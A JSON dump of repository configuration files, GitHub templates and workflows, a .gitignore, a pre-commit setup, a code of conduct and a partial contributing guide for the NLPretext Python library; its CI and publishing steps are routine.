[
  {
    "path": ".dockerignore",
    "content": "# Git\n.git\n.gitignore\n.github\n\n# Docker\n.dockerignore\ndocker/\n\n# IDE\n.idea\n.vscode\n\n# Byte-compiled / optimized / DLL files\n__pycache__/\n**/__pycache__/\n*.pyc\n*.pyo\n*.pyd\n.Python\n*.py[cod]\n*$py.class\n.pytest_cache/\n.mypy_cache/\n\n# poetry\n.venv\n\n# C extensions\n*.so\n\n# Virtual environment\n.venv\nvenv\n\n.DS_Store\n.AppleDouble\n.LSOverride\n._*\n"
  },
  {
    "path": ".editorconfig",
    "content": "# Check http://editorconfig.org for more information\n# This is the main config file for this project:\nroot = true\n\n[*]\ncharset = utf-8\nend_of_line = lf\ninsert_final_newline = true\nindent_style = space\nindent_size = 2\ntrim_trailing_whitespace = true\n\n[*.{py,pyi}]\nindent_style = space\nindent_size = 4\n\n[Makefile]\nindent_style = tab\n\n[*.md]\ntrim_trailing_whitespace = false\n\n[*.{diff,patch}]\ntrim_trailing_whitespace = false\n"
  },
  {
    "path": ".github/.stale.yml",
    "content": "# Number of days of inactivity before an issue becomes stale\ndaysUntilStale: 60\n# Number of days of inactivity before a stale issue is closed\ndaysUntilClose: 7\n# Issues with these labels will never be considered stale\nexemptLabels:\n  - pinned\n  - security\n# Label to use when marking an issue as stale\nstaleLabel: wontfix\n# Comment to post when marking an issue as stale. Set to `false` to disable\nmarkComment: >\n  This issue has been automatically marked as stale because it has not had\n  recent activity. It will be closed if no further activity occurs. Thank you\n  for your contributions.\n# Comment to post when closing a stale issue. Set to `false` to disable\ncloseComment: false\n"
  },
  {
    "path": ".github/CODEOWNERS",
    "content": "# https://help.github.com/en/articles/about-code-owners\n\n*   @julesbertrand @amaleelhamri @hugovasselin @Guillaume6606\n"
  },
  {
    "path": ".github/ISSUE_TEMPLATE/bug_report.md",
    "content": "---\nname: 🐛 Bug report\nabout: If something isn't working 🔧\ntitle: ''\nlabels: bug\nassignees:\n---\n\n## 🐛 Bug Report\n\n<!-- A clear and concise description of what the bug is. -->\n\n## 🔬 How To Reproduce\n\nSteps to reproduce the behavior:\n\n1. ...\n\n### Code sample\n\n<!-- If applicable, attach a minimal code sample to reproduce the described issue. -->\n\n### Environment\n\n* OS: [e.g. Linux / Windows / macOS]\n* Python version, get it with:\n\n```bash\npython --version\n```\n\n### Screenshots\n\n<!-- If applicable, add screenshots to help explain your problem. -->\n\n## 📈 Expected behavior\n\n<!-- A clear and concise description of what you expected to happen. -->\n\n## 📎 Additional context\n\n<!-- Add any other context about the problem here. -->\n"
  },
  {
    "path": ".github/ISSUE_TEMPLATE/config.yml",
    "content": "# Configuration: https://help.github.com/en/github/building-a-strong-community/configuring-issue-templates-for-your-repository\n\nblank_issues_enabled: false\n"
  },
  {
    "path": ".github/ISSUE_TEMPLATE/feature_request.md",
    "content": "---\nname: 🚀 Feature request\nabout: Suggest an idea for this project 🏖\ntitle: ''\nlabels: enhancement\nassignees:\n---\n\n## 🚀 Feature Request\n\n<!-- A clear and concise description of the feature proposal. -->\n\n## 🔈 Motivation\n\n<!-- Please describe the motivation for this proposal. -->\n\n## 🛰 Alternatives\n\n<!-- A clear and concise description of any alternative solutions or features you've considered. -->\n\n## 📎 Additional context\n\n<!-- Add any other context or screenshots about the feature request here. -->\n"
  },
  {
    "path": ".github/ISSUE_TEMPLATE/question.md",
    "content": "---\nname: ❓ Question\nabout: Ask a question about this project 🎓\ntitle: ''\nlabels: question\nassignees:\n---\n\n## Checklist\n\n<!-- Mark with an `x` all the checkboxes that apply (like `[x]`) -->\n\n- [ ] I've searched the project's [`issues`](https://github.com/artefactory/NLPretext/issues?q=is%3Aissue).\n\n## ❓ Question\n\n<!-- What is your question -->\n\nHow can I [...]?\n\nIs it possible to [...]?\n\n## 📎 Additional context\n\n<!-- Add any other context or screenshots about the feature request here. -->\n"
  },
  {
    "path": ".github/PULL_REQUEST_TEMPLATE.md",
    "content": "## Description\n\n<!-- Add a more detailed description of the changes if needed. -->\n\n## Related Issue\n\n<!-- If your PR refers to a related issue, link it here. -->\n\n## Type of Change\n\n<!-- Mark with an `x` all the checkboxes that apply (like `[x]`) -->\n\n- [ ] 📚 Examples / docs / tutorials / dependencies update\n- [ ] 🔧 Bug fix (non-breaking change which fixes an issue)\n- [ ] 🥂 Improvement (non-breaking change which improves an existing feature)\n- [ ] 🚀 New feature (non-breaking change which adds functionality)\n- [ ] 💥 Breaking change (fix or feature that would cause existing functionality to change)\n- [ ] 🔐 Security fix\n\n## Checklist\n\n<!-- Mark with an `x` all the checkboxes that apply (like `[x]`) -->\n\n- [ ] I've read the [`CODE_OF_CONDUCT.md`](https://github.com/artefactory/NLPretext/blob/main/CODE_OF_CONDUCT.md) document.\n- [ ] I've read the [`CONTRIBUTING.md`](https://github.com/artefactory/NLPretext/blob/main/CONTRIBUTING.md) guide.\n- [ ] I've updated the code style using `make format-code`.\n- [ ] I've written tests for all new methods and classes that I created.\n- [ ] I've written the docstring in Google format for all the methods and classes that I used.\n"
  },
  {
    "path": ".github/dependabot.yml",
    "content": "# Configuration: https://dependabot.com/docs/config-file/\n# Docs: https://docs.github.com/en/github/administering-a-repository/keeping-your-dependencies-updated-automatically\n\nversion: 2\n\nupdates:\n  - package-ecosystem: \"pip\"\n    directory: \"/\"\n    schedule:\n      interval: \"weekly\"\n      day: \"monday\"\n      time: \"09:00\"\n    allow:\n      - dependency-type: \"all\"\n    ignore:\n      - dependency-name: \"*\"\n        update-types: [\"version-update:semver-patch\"]\n    labels:\n      - draft\n      - dependencies\n      - python\n  - package-ecosystem: \"github-actions\"\n    directory: \"/\"\n    schedule:\n      interval: \"weekly\"\n      day: \"monday\"\n      time: \"09:00\"\n    allow:\n      - dependency-type: \"all\"\n    labels:\n      - draft\n      - dependencies\n      - github_actions\n  - package-ecosystem: \"docker\"\n    directory: \"/docker/\"\n    schedule:\n      interval: \"weekly\"\n      day: \"monday\"\n      time: \"09:00\"\n    allow:\n      - dependency-type: \"all\"\n    labels:\n      - draft\n      - dependencies\n      - docker\n"
  },
  {
    "path": ".github/release-drafter.yml",
    "content": "# Release drafter configuration https://github.com/release-drafter/release-drafter#configuration\n# Emojis were chosen to match the https://gitmoji.carloscuesta.me/\n\nname-template: \"$NEXT_PATCH_VERSION\"\ntag-template: \"$NEXT_PATCH_VERSION\"\n\ncategories:\n  - title: \":rocket: Features\"\n    labels: [enhancement, feature]\n  - title: \":wrench: Fixes & Refactoring\"\n    labels: [bug, refactoring, bugfix, fix]\n  - title: \":package: Build System & CI/CD\"\n    labels: [build, ci, testing]\n  - title: \":boom: Breaking Changes\"\n    labels: [breaking]\n  - title: \":pencil: Documentation\"\n    labels: [documentation]\n  - title: \":arrow_up: Dependencies updates\"\n    labels: [dependencies]\n\ntemplate: |\n  ## What’s Changed\n\n  $CHANGES\n\n  ## :busts_in_silhouette: List of contributors\n\n  $CONTRIBUTORS\n"
  },
  {
    "path": ".github/workflows/cd.yml",
    "content": "name: Continuous Deployment\non:\n  release:\n    types: [published]\n\njobs:\n\n  docker:\n\n    runs-on: ubuntu-latest\n\n    steps:\n    - name: Checkout\n      uses: actions/checkout@v4\n\n    - name: Set up Docker Buildx\n      uses: docker/setup-buildx-action@v3\n\n    - name: Login to Github Container Registry\n      uses: docker/login-action@v3\n      with:\n        username: ${{ github.actor }}\n        password: ${{ secrets.GITHUB_TOKEN }}\n        registry: ghcr.io\n\n    - name: Set tag name\n      id: tag\n      run: echo \"tag_name=${GITHUB_REF//\\//-}\" >> $GITHUB_OUTPUT\n      env:\n        GITHUB_REF: ${{ github.ref }}\n\n    - name: Build and push\n      uses: docker/build-push-action@v4\n      with:\n        context: .\n        file: ./docker/Dockerfile\n        push: true\n        tags: |\n          ghcr.io/artefactory/nlpretext:${{ steps.tag.outputs.tag_name }}\n          ghcr.io/artefactory/nlpretext:latest\n        cache-from: type=registry,ref=ghcr.io/artefactory/nlpretext:latest\n        cache-to: type=inline\n\n    - name: Scan image\n      uses: anchore/scan-action@v3\n      id: scan\n      with:\n        image: \"ghcr.io/artefactory/nlpretext:${{ steps.tag.outputs.tag_name }}\"\n        output-format: table\n\n    - name: upload Anchore scan SARIF report\n      if: success() || failure()\n      uses: github/codeql-action/upload-sarif@v1\n      with:\n        sarif_file: ${{ steps.scan.outputs.sarif }}\n\n  documentation_and_package:\n\n    runs-on: ubuntu-latest\n\n    strategy:\n      matrix:\n        python-version: [\"3.8\"]\n\n    steps:\n\n    - name: Checkout\n      uses: actions/checkout@v4\n\n    - name: Set up Python ${{ matrix.python-version }}\n      uses: actions/setup-python@v4\n      with:\n        python-version: ${{ matrix.python-version }}\n\n    - name: Install poetry and pandoc\n      run: |\n        sudo apt-get install pandoc\n        make download-poetry\n\n    - name: Set up cache\n      uses: 
actions/cache@v3.3.2\n      with:\n        path: ~/.cache/pypoetry/virtualenvs\n        key: venv-${{ matrix.python-version }}-${{ hashFiles('pyproject.toml') }}-${{ hashFiles('poetry.lock') }}\n\n    - name: Set Poetry Path\n      run: |\n        echo \"$HOME/.poetry/bin\" >> $GITHUB_PATH\n\n    - name: Install dependencies\n      run: |\n        poetry install -E torch -E dask\n\n    - name: Publish to PyPI\n      env:\n        PYPI_TOKEN: ${{ secrets.PYPI_TOKEN }}\n      run: |\n        poetry config pypi-token.pypi $PYPI_TOKEN\n        poetry publish --build\n\n    - name: Run build script for Sphinx pages\n      run: |\n        poetry run git config --global user.name \"Github-Pages Bot\"\n        poetry run git config --global user.email \"github-pages@artefactory.com\"\n        poetry run sh docs/scripts/buildsite.sh\n      shell: bash\n"
  },
  {
    "path": ".github/workflows/ci.yml",
    "content": "# GNU Lesser General Public License v3.0 only\n# Copyright (C) 2020 Artefact\n# licence-information@artefact.com\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU Lesser General Public\n# License as published by the Free Software Foundation; either\n# version 3 of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU\n# Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public License\n# along with this program; if not, write to the Free Software Foundation,\n# Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.\nname: Continuous Integration\n\non:\n  push:\n    branches:\n      - main\n  pull_request:\n    branches:\n      - '*'\n\njobs:\n  ci:\n    runs-on: ubuntu-latest\n    strategy:\n      matrix:\n        python-version: [\"3.8\", \"3.9\", \"3.10\"]\n    if: ${{ !contains(github.event.pull_request.labels.*.name, 'draft') }}\n\n    steps:\n    - uses: actions/checkout@v2\n\n    - name: Set up Python ${{ matrix.python-version }}\n      uses: actions/setup-python@v4\n      with:\n        python-version: ${{ matrix.python-version }}\n        cache: 'pip'\n\n    - name: Install poetry\n      run: make download-poetry\n\n    - name: Set up pip cache\n      uses: actions/cache@v3.3.2\n      with:\n        path: ~/.cache/pypoetry/virtualenvs\n        key: venv-${{ matrix.python-version }}-${{ hashFiles('pyproject.toml') }}-${{ hashFiles('poetry.lock') }}\n\n    - name: Set up mypy cache\n      uses: actions/cache@v3.2.4\n      with:\n        path: ${{ github.workspace }}/.mypy_cache\n        key: mypy-${{ matrix.python-version }}\n\n    - name: Set Poetry Path\n      run: |\n        echo \"$HOME/.poetry/bin\" >> 
$GITHUB_PATH\n\n    - name: Install dependencies\n      run: |\n        poetry run pip install --upgrade pip\n        poetry install -E torch -E dask\n\n    - name: Run safety checks\n      run: |\n        STRICT=1 make check-safety\n\n    - name: Lint and format\n      run: |\n        make format-code\n\n    - name: Run tests\n      run: |\n        make test\n"
  },
  {
    "path": ".github/workflows/greetings.yml",
    "content": "name: Greetings\n\non:\n  pull_request:\n    types:\n      - opened\n      - reopened\n      - edited\n      - labeled\n      - unlabeled\n      - synchronize\n  issues:\n\njobs:\n  greeting:\n    runs-on: ubuntu-latest\n    if: ${{ !contains(github.head_ref, 'dependabot/') }}\n    steps:\n    - uses: actions/first-interaction@v1\n      with:\n        repo-token: ${{ secrets.GITHUB_TOKEN }}\n        pr-message:  'Hello @${{ github.actor }}, thank you for submitting a PR! We will respond as soon as possible.'\n        issue-message: |\n          Hello @${{ github.actor }}, thank you for your interest in our work!\n\n          If this is a bug report, please provide screenshots and **minimum viable code to reproduce your issue**, otherwise we can not help you.\n"
  },
  {
    "path": ".github/workflows/release-drafter.yml",
    "content": "name: Release Drafter\n\non:\n  push:\n    # branches to consider in the event; optional, defaults to all\n    branches:\n      - main\n\njobs:\n  update_release_draft:\n    runs-on: ubuntu-latest\n    steps:\n      # Drafts your next Release notes as Pull Requests are merged into \"main\"\n      - uses: release-drafter/release-drafter@v5.22.0\n        env:\n          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}\n"
  },
  {
    "path": ".gitignore",
    "content": "# Created by https://www.gitignore.io/api/osx,python,pycharm,windows,visualstudio,visualstudiocode\n# Edit at https://www.gitignore.io/?templates=osx,python,pycharm,windows,visualstudio,visualstudiocode\n\n### OSX ###\n# General\n.DS_Store\n.AppleDouble\n.LSOverride\n\n# Icon must end with two \\r\nIcon\n\n# Thumbnails\n._*\n\n# Files that might appear in the root of a volume\n.DocumentRevisions-V100\n.fseventsd\n.Spotlight-V100\n.TemporaryItems\n.Trashes\n.VolumeIcon.icns\n.com.apple.timemachine.donotpresent\n\n# Directories potentially created on remote AFP share\n.AppleDB\n.AppleDesktop\nNetwork Trash Folder\nTemporary Items\n.apdisk\n\n### PyCharm ###\n# Covers JetBrains IDEs: IntelliJ, RubyMine, PhpStorm, AppCode, PyCharm, CLion, Android Studio and WebStorm\n# Reference: https://intellij-support.jetbrains.com/hc/en-us/articles/206544839\n\n# User-specific stuff\n.idea/\n.idea/**/workspace.xml\n.idea/**/tasks.xml\n.idea/**/usage.statistics.xml\n.idea/**/dictionaries\n.idea/**/shelf\n\n# Generated files\n.idea/**/contentModel.xml\n\n# Sensitive or high-churn files\n.idea/**/dataSources/\n.idea/**/dataSources.ids\n.idea/**/dataSources.local.xml\n.idea/**/sqlDataSources.xml\n.idea/**/dynamic.xml\n.idea/**/uiDesigner.xml\n.idea/**/dbnavigator.xml\n\n# Gradle\n.idea/**/gradle.xml\n.idea/**/libraries\n\n# Gradle and Maven with auto-import\n# When using Gradle or Maven with auto-import, you should exclude module files,\n# since they will be recreated, and may cause churn.  
Uncomment if using\n# auto-import.\n# .idea/modules.xml\n# .idea/*.iml\n# .idea/modules\n# *.iml\n# *.ipr\n\n# CMake\ncmake-build-*/\n\n# Mongo Explorer plugin\n.idea/**/mongoSettings.xml\n\n# File-based project format\n*.iws\n\n# IntelliJ\nout/\n\n# mpeltonen/sbt-idea plugin\n.idea_modules/\n\n# JIRA plugin\natlassian-ide-plugin.xml\n\n# Cursive Clojure plugin\n.idea/replstate.xml\n\n# Crashlytics plugin (for Android Studio and IntelliJ)\ncom_crashlytics_export_strings.xml\ncrashlytics.properties\ncrashlytics-build.properties\nfabric.properties\n\n# Editor-based Rest Client\n.idea/httpRequests\n\n# Android studio 3.1+ serialized cache file\n.idea/caches/build_file_checksums.ser\n\n### PyCharm Patch ###\n# Comment Reason: https://github.com/joeblau/gitignore.io/issues/186#issuecomment-215987721\n\n# *.iml\n# modules.xml\n# .idea/misc.xml\n# *.ipr\n\n# Sonarlint plugin\n.idea/**/sonarlint/\n\n# SonarQube Plugin\n.idea/**/sonarIssues.xml\n\n# Markdown Navigator plugin\n.idea/**/markdown-navigator.xml\n.idea/**/markdown-navigator/\n\n### Python ###\n# Byte-compiled / optimized / DLL files\n__pycache__/\n*.py[cod]\n*$py.class\n\n# C extensions\n*.so\n\n# Distribution / packaging\n.Python\nenv/\nbuild/\ndevelop-eggs/\ndist/\ndownloads/\neggs/\n.eggs/\nlib/\nlib64/\nparts/\nsdist/\nvar/\nwheels/\npip-wheel-metadata/\nshare/python-wheels/\n*.egg-info/\n.installed.cfg\n*.egg\nMANIFEST\n\n# PyInstaller\n#  Usually these files are written by a python script from a template\n#  before PyInstaller builds the exe, so as to inject date/other infos into it.\n*.manifest\n*.spec\n\n# Installer logs\npip-log.txt\npip-delete-this-directory.txt\n\n# Unit test / coverage reports\nhtmlcov/\n.tox/\n.nox/\n.coverage\n.coverage.*\n.cache\nnosetests.xml\ncoverage.xml\n*.cover\n.hypothesis/\n.pytest_cache/\n.ruff_cache/\n\n# Translations\n*.mo\n*.pot\n\n# Scrapy stuff:\n.scrapy\n\n# Django stuff:\n*.log\n\n# Sphinx documentation\ndocs/_build/\n\n# PyBuilder\ntarget/\n\n# 
pyenv\n.python-version\n\n# poetry\n.venv\n\n# pipenv\n#   According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control.\n#   However, in case of collaboration, if having platform-specific dependencies or dependencies\n#   having no cross-platform support, pipenv may install dependencies that don't work, or not\n#   install all needed dependencies.\n#Pipfile.lock\n\n# celery beat schedule file\ncelerybeat-schedule\n\n# SageMath parsed files\n*.sage.py\n\n# Spyder project settings\n.spyderproject\n.spyproject\n\n# Rope project settings\n.ropeproject\n\n# Mr Developer\n.mr.developer.cfg\n.project\n.pydevproject\n\n# mkdocs documentation\n/site\n\n# mypy\n.mypy_cache/\n.dmypy.json\ndmypy.json\n\n# Pyre type checker\n.pyre/\n\n# Plugins\n.secrets.baseline\n\n### VisualStudioCode ###\n.vscode/*\n!.vscode/tasks.json\n!.vscode/launch.json\n!.vscode/extensions.json\n\n### VisualStudioCode Patch ###\n# Ignore all local history of files\n.history\n\n### Windows ###\n# Windows thumbnail cache files\nThumbs.db\nThumbs.db:encryptable\nehthumbs.db\nehthumbs_vista.db\n\n# Dump file\n*.stackdump\n\n# Folder config file\n[Dd]esktop.ini\n\n# Recycle Bin used on file shares\n$RECYCLE.BIN/\n\n# Windows Installer files\n*.cab\n*.msi\n*.msix\n*.msm\n*.msp\n\n# Windows shortcuts\n*.lnk\n\n### VisualStudio ###\n## Ignore Visual Studio temporary files, build results, and\n## files generated by popular Visual Studio add-ons.\n##\n## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore\n\n# User-specific files\n*.rsuser\n*.suo\n*.user\n*.userosscache\n*.sln.docstates\n\n# User-specific files (MonoDevelop/Xamarin Studio)\n*.userprefs\n\n# Mono auto generated files\nmono_crash.*\n\n# Build results\n[Dd]ebug/\n[Dd]ebugPublic/\n[Rr]elease/\n[Rr]eleases/\nx64/\nx86/\n[Aa][Rr][Mm]/\n[Aa][Rr][Mm]64/\nbld/\n[Bb]in/\n[Oo]bj/\n[Ll]og/\n\n# Visual Studio 2015/2017 cache/options directory\n.vs/\n# Uncomment if you have tasks that create the 
project's static files in wwwroot\n#wwwroot/\n\n# Visual Studio 2017 auto generated files\nGenerated\\ Files/\n\n# MSTest test Results\n[Tt]est[Rr]esult*/\n[Bb]uild[Ll]og.*\n\n# NUnit\n*.VisualState.xml\nTestResult.xml\nnunit-*.xml\n\n# Build Results of an ATL Project\n[Dd]ebugPS/\n[Rr]eleasePS/\ndlldata.c\n\n# Benchmark Results\nBenchmarkDotNet.Artifacts/\n\n# .NET Core\nproject.lock.json\nproject.fragment.lock.json\nartifacts/\n\n# StyleCop\nStyleCopReport.xml\n\n# Files built by Visual Studio\n*_i.c\n*_p.c\n*_h.h\n*.ilk\n*.obj\n*.iobj\n*.pch\n*.pdb\n*.ipdb\n*.pgc\n*.pgd\n*.rsp\n*.sbr\n*.tlb\n*.tli\n*.tlh\n*.tmp\n*.tmp_proj\n*_wpftmp.csproj\n*.vspscc\n*.vssscc\n.builds\n*.pidb\n*.svclog\n*.scc\n\n# Chutzpah Test files\n_Chutzpah*\n\n# Visual C++ cache files\nipch/\n*.aps\n*.ncb\n*.opendb\n*.opensdf\n*.sdf\n*.cachefile\n*.VC.db\n*.VC.VC.opendb\n\n# Visual Studio profiler\n*.psess\n*.vsp\n*.vspx\n*.sap\n\n# Visual Studio Trace Files\n*.e2e\n\n# TFS 2012 Local Workspace\n$tf/\n\n# Guidance Automation Toolkit\n*.gpState\n\n# ReSharper is a .NET coding add-in\n_ReSharper*/\n*.[Rr]e[Ss]harper\n*.DotSettings.user\n\n# JustCode is a .NET coding add-in\n.JustCode\n\n# TeamCity is a build add-in\n_TeamCity*\n\n# DotCover is a Code Coverage Tool\n*.dotCover\n\n# AxoCover is a Code Coverage Tool\n.axoCover/*\n!.axoCover/settings.json\n\n# Visual Studio code coverage results\n*.coverage\n*.coveragexml\n\n# NCrunch\n_NCrunch_*\n.*crunch*.local.xml\nnCrunchTemp_*\n\n# MightyMoose\n*.mm.*\nAutoTest.Net/\n\n# Web workbench (sass)\n.sass-cache/\n\n# Installshield output folder\n[Ee]xpress/\n\n# DocProject is a documentation generator add-in\nDocProject/buildhelp/\nDocProject/Help/*.HxT\nDocProject/Help/*.HxC\nDocProject/Help/*.hhc\nDocProject/Help/*.hhk\nDocProject/Help/*.hhp\nDocProject/Help/Html2\nDocProject/Help/html\n\n# Click-Once directory\npublish/\n\n# Publish Web Output\n*.[Pp]ublish.xml\n*.azurePubxml\n# Note: Comment the next line if you want to checkin your web deploy 
settings,\n# but database connection strings (with potential passwords) will be unencrypted\n*.pubxml\n*.publishproj\n\n# Microsoft Azure Web App publish settings. Comment the next line if you want to\n# checkin your Azure Web App publish settings, but sensitive information contained\n# in these scripts will be unencrypted\nPublishScripts/\n\n# NuGet Packages\n*.nupkg\n# NuGet Symbol Packages\n*.snupkg\n# The packages folder can be ignored because of Package Restore\n**/[Pp]ackages/*\n# except build/, which is used as an MSBuild target.\n!**/[Pp]ackages/build/\n# Uncomment if necessary however generally it will be regenerated when needed\n#!**/[Pp]ackages/repositories.config\n# NuGet v3's project.json files produces more ignorable files\n*.nuget.props\n*.nuget.targets\n\n# Microsoft Azure Build Output\ncsx/\n*.build.csdef\n\n# Microsoft Azure Emulator\necf/\nrcf/\n\n# Windows Store app package directories and files\nAppPackages/\nBundleArtifacts/\nPackage.StoreAssociation.xml\n_pkginfo.txt\n*.appx\n*.appxbundle\n*.appxupload\n\n# Visual Studio cache files\n# files ending in .cache can be ignored\n*.[Cc]ache\n# but keep track of directories ending in .cache\n!?*.[Cc]ache/\n\n# Others\nClientBin/\n~$*\n*~\n*.dbmdl\n*.dbproj.schemaview\n*.jfm\n*.pfx\n*.publishsettings\norleans.codegen.cs\n\n# Including strong name files can present a security risk\n# (https://github.com/github/gitignore/pull/2483#issue-259490424)\n#*.snk\n\n# Since there are multiple workflows, uncomment next line to ignore bower_components\n# (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)\n#bower_components/\n\n# RIA/Silverlight projects\nGenerated_Code/\n\n# Backup & report files from converting an old project file\n# to a newer Visual Studio version. 
Backup files are not needed,\n# because we have git ;-)\n_UpgradeReport_Files/\nBackup*/\nUpgradeLog*.XML\nUpgradeLog*.htm\nServiceFabricBackup/\n*.rptproj.bak\n\n# SQL Server files\n*.mdf\n*.ldf\n*.ndf\n\n# Business Intelligence projects\n*.rdl.data\n*.bim.layout\n*.bim_*.settings\n*.rptproj.rsuser\n*- [Bb]ackup.rdl\n*- [Bb]ackup ([0-9]).rdl\n*- [Bb]ackup ([0-9][0-9]).rdl\n\n# Microsoft Fakes\nFakesAssemblies/\n\n# GhostDoc plugin setting file\n*.GhostDoc.xml\n\n# Node.js Tools for Visual Studio\n.ntvs_analysis.dat\nnode_modules/\n\n# Visual Studio 6 build log\n*.plg\n\n# Visual Studio 6 workspace options file\n*.opt\n\n# Visual Studio 6 auto-generated workspace file (contains which files were open etc.)\n*.vbw\n\n# Visual Studio LightSwitch build output\n**/*.HTMLClient/GeneratedArtifacts\n**/*.DesktopClient/GeneratedArtifacts\n**/*.DesktopClient/ModelManifest.xml\n**/*.Server/GeneratedArtifacts\n**/*.Server/ModelManifest.xml\n_Pvt_Extensions\n\n# Paket dependency manager\n.paket/paket.exe\npaket-files/\n\n# FAKE - F# Make\n.fake/\n\n# CodeRush personal settings\n.cr/personal\n\n# Python Tools for Visual Studio (PTVS)\n*.pyc\n\n# Cake - Uncomment if you are using it\n# tools/**\n# !tools/packages.config\n\n# Tabs Studio\n*.tss\n\n# Telerik's JustMock configuration file\n*.jmconfig\n\n# BizTalk build output\n*.btp.cs\n*.btm.cs\n*.odx.cs\n*.xsd.cs\n\n# OpenCover UI analysis results\nOpenCover/\n\n# Azure Stream Analytics local run output\nASALocalRun/\n\n# MSBuild Binary and Structured Log\n*.binlog\n\n# NVidia Nsight GPU debugger configuration file\n*.nvuser\n\n# MFractors (Xamarin productivity tool) working folder\n.mfractor/\n\n# Local History for Visual Studio\n.localhistory/\n\n# BeatPulse healthcheck temp database\nhealthchecksdb\n\n# Backup folder for Package Reference Convert tool in Visual Studio 2017\nMigrationBackup/\n\n# DotEnv configuration\n.env\n\n# Database\n*.db\n*.rdb\n\n# Pycharm\n.idea\nvenv/\n\n# VS Code\n.vscode/\n\n# Spyder\n.spyproject/\n\n# 
Jupyter NB Checkpoints\n.ipynb_checkpoints/\n\n# exclude data from source control by default\n\n\n# vim\n*.swp\n*.swo\n\ndata/\n"
  },
  {
    "path": ".pre-commit-config.yaml",
    "content": "default_language_version:\n  python: python3.10\n\n\nrepos:\n  - repo: https://github.com/pre-commit/pre-commit-hooks\n    rev: v4.5.0\n    hooks:\n    - id: trailing-whitespace\n    - id: end-of-file-fixer\n    - id: check-yaml\n    - id: check-toml\n    - id: check-json\n    - id: check-added-large-files\n\n  - repo: local\n    hooks:\n      - id: isort\n        name: isort\n        entry: poetry run isort --settings-path pyproject.toml\n        types: [python]\n        language: system\n        stages: [commit, push]\n      - id: pyupgrade\n        name: pyupgrade\n        entry: poetry run pyupgrade --py38-plus\n        types: [python]\n        language: system\n        stages: [commit, push]\n      - id: black\n        name: black\n        entry: poetry run black --config pyproject.toml\n        types: [python]\n        language: system\n        stages: [commit, push]\n      - id: ruff\n        name: ruff\n        entry: poetry run ruff check --config pyproject.toml\n        types: [python]\n        language: system\n        stages: [commit, push]\n      - id: mypy\n        name: mypy\n        entry: poetry run mypy\n        require_serial: true\n        types: [python]\n        language: system\n        stages: [push]\n      - id: gitleaks\n        name: gitleaks\n        entry: make gitleaks\n        require_serial: true\n        types: [file]\n        language: system\n        pass_filenames: false\n        stages: [push]\n"
  },
  {
    "path": "CODE_OF_CONDUCT.md",
    "content": "# Contributor Covenant Code of Conduct\n\n## Our Pledge\n\nIn the interest of fostering an open and welcoming environment, we as\ncontributors and maintainers pledge to making participation in our project and\nour community a harassment-free experience for everyone, regardless of age, body\nsize, disability, ethnicity, sex characteristics, gender identity and expression,\nlevel of experience, education, socio-economic status, nationality, personal\nappearance, race, religion, or sexual identity and orientation.\n\n## Our Standards\n\nExamples of behavior that contributes to creating a positive environment\ninclude:\n\n* Using welcoming and inclusive language\n* Being respectful of differing viewpoints and experiences\n* Gracefully accepting constructive criticism\n* Focusing on what is best for the community\n* Showing empathy towards other community members\n\nExamples of unacceptable behavior by participants include:\n\n* The use of sexualized language or imagery and unwelcome sexual attention or\n advances\n* Trolling, insulting/derogatory comments, and personal or political attacks\n* Public or private harassment\n* Publishing others' private information, such as a physical or electronic\n address, without explicit permission\n* Other conduct which could reasonably be considered inappropriate in a\n professional setting\n\n## Our Responsibilities\n\nProject maintainers are responsible for clarifying the standards of acceptable\nbehavior and are expected to take appropriate and fair corrective action in\nresponse to any instances of unacceptable behavior.\n\nProject maintainers have the right and responsibility to remove, edit, or\nreject comments, commits, code, wiki edits, issues, and other contributions\nthat are not aligned to this Code of Conduct, or to ban temporarily or\npermanently any contributor for other behaviors that they deem inappropriate,\nthreatening, offensive, or harmful.\n\n## Scope\n\nThis Code of Conduct applies both within 
project spaces and in public spaces\nwhen an individual is representing the project or its community. Examples of\nrepresenting a project or community include using an official project e-mail\naddress, posting via an official social media account, or acting as an appointed\nrepresentative at an online or offline event. Representation of a project may be\nfurther defined and clarified by project maintainers.\n\n## Enforcement\n\nInstances of abusive, harassing, or otherwise unacceptable behavior may be\nreported by contacting the project team at rafaelle.aygalenq@artefact.com. All\ncomplaints will be reviewed and investigated and will result in a response that\nis deemed necessary and appropriate to the circumstances. The project team is\nobligated to maintain confidentiality with regard to the reporter of an incident.\nFurther details of specific enforcement policies may be posted separately.\n\nProject maintainers who do not follow or enforce the Code of Conduct in good\nfaith may face temporary or permanent repercussions as determined by other\nmembers of the project's leadership.\n\n## Attribution\n\nThis Code of Conduct is adapted from the [Contributor Covenant][homepage], version 1.4,\navailable at https://www.contributor-covenant.org/version/1/4/code-of-conduct.html\n\n[homepage]: https://www.contributor-covenant.org\n\nFor answers to common questions about this code of conduct, see\nhttps://www.contributor-covenant.org/faq\n"
  },
  {
    "path": "CONTRIBUTING.md",
    "content": "NLPretext\n==============================\n\n# How to contribute\n\n## Dependencies\n\nWe use `poetry` to manage the [dependencies](https://github.com/python-poetry/poetry).\nIf you don't have `poetry` installed, you should run the command below.\n\n```bash\nmake download-poetry; export PATH=\"$HOME/.local/bin:$PATH\"\n```\n\nTo install dependencies and prepare [`pre-commit`](https://pre-commit.com/) hooks you would need to run `install` command:\n\n```bash\nmake install\n```\n\nTo activate your `virtualenv` run `poetry shell`.\n\n## Codestyle\n\nAfter you run `make install` you can execute the automatic code formatting.\n\n```bash\nmake format-code\n```\n\n### Checks\n\nMany checks are configured for this project. Command `make check-style` will run black diffs, darglint docstring style and mypy.\nThe `make check-safety` command will look at the security of your code.\n\nYou can also use `STRICT=1` flag to make the check be strict.\n\n### Before submitting\n\nBefore submitting your code please do the following steps:\n\n1. Add any changes you want\n1. Add tests for the new changes\n1. Edit documentation if you have changed something significant\n1. Run `make format-code` to format your changes.\n1. Run `STRICT=1 make check-style` to ensure that types and docs are correct\n1. 
